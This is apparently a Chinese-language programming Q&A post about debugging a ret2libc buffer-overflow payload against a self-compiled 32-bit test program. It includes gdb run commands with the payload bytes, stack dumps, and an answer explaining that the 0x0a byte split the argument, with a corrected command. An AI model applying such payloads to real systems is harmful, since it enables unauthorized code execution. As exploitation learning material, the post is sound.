我正在尝试通过简单程序返回libc。我设法找到了 存储输入字符串的堆栈地址,以及libc函数的位置,并在此基础上构建有效载荷。
[填充(252字节)] + [系统(4字节)] + [退出(4字节)] + [参数(4字节)]
我用gdb打开了易受攻击的程序并注入了有效负载。当我检查堆栈帧时,我可以看到在正确的位置加载了252个字节的填充,但是有效负载的最后12个字节部分似乎丢失了,或者以某种方式被替换了。
因此出于好奇,我对有效载荷做了一些更改,尤其是填充部分。
[padding(96)] + [system(4)] + [padding(152)] + [system(4)] + [exit(4)] + [argument(4)]
然后堆栈仅保留前96个字节的部分,其余部分不存在。
我在64位kali-linux上用python注入了有效负载。易受攻击的程序是使用gcc和-m32 -fno-stack-protector选项编译的。
(gdb) run $(python -c 'print "\x41"*252 + "\x60\x0a\x05\x08" + "\x30\xfd\x04\x08" + "\x64\x79\x09\x08"')
(gdb) x/256xw $ebp-0xfc
0xffffd010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd070: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd080: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd090: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd100: 0x41414141 0x41414141 0x41414141 0x00000060
0xffffd110: 0xffffd130 0x080dc000 0x00000000 0x0804a25b
0xffffd120: 0x080dc000 0x080dc000 0x080dc000 0x0804a25b
0xffffd130: 0x00000003 0xffffd1e4 0xffffd1f4 0xffffd184
0xffffd140: 0x00000000 0x00000000 0x00000000 0x080dc000
...
(gdb) run $(python -c 'print "\x41"*96 +"\x60\x0a\x05\x08"+ "\x41"*152 + "\x60\x0a\x05\x08" + "\x30\xfd\x04\x08" + "\x64\x79\x09\x08"')
(gdb) x/256wx $ebp-0xfc
0xffffd010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffffd070: 0x00000060 0x00000000 0x0000bfc0 0xa9173800
0xffffd080: 0x080b12ef 0x00002933 0x00000000 0x080dc000
0xffffd090: 0x00000001 0x080dc000 0x080dd900 0x080495fa
0xffffd0a0: 0x00000004 0x080ddf74 0x0804fa99 0x00008000
0xffffd0b0: 0x080b0fa5 0x00040000 0x00000000 0x080abc6a
...
似乎地址\x60\x0a\x05\x08被\x60\x00\x00\x00取代了。有什么我想念的吗?还是这与编译器有关?
答案 0 :(得分:0)
似乎您正在尝试运行将有效载荷作为参数传递的程序,但是它包含字符\ x0a,这导致有效载荷被分成两个单独的参数。
在命令周围加上双引号应允许您将其作为单参数传递:
(gdb) run "$(python -c 'print "\x41"*252 + "\x60\x0a\x05\x08" + "\x30\xfd\x04\x08" + "\x64\x79\x09\x08"')"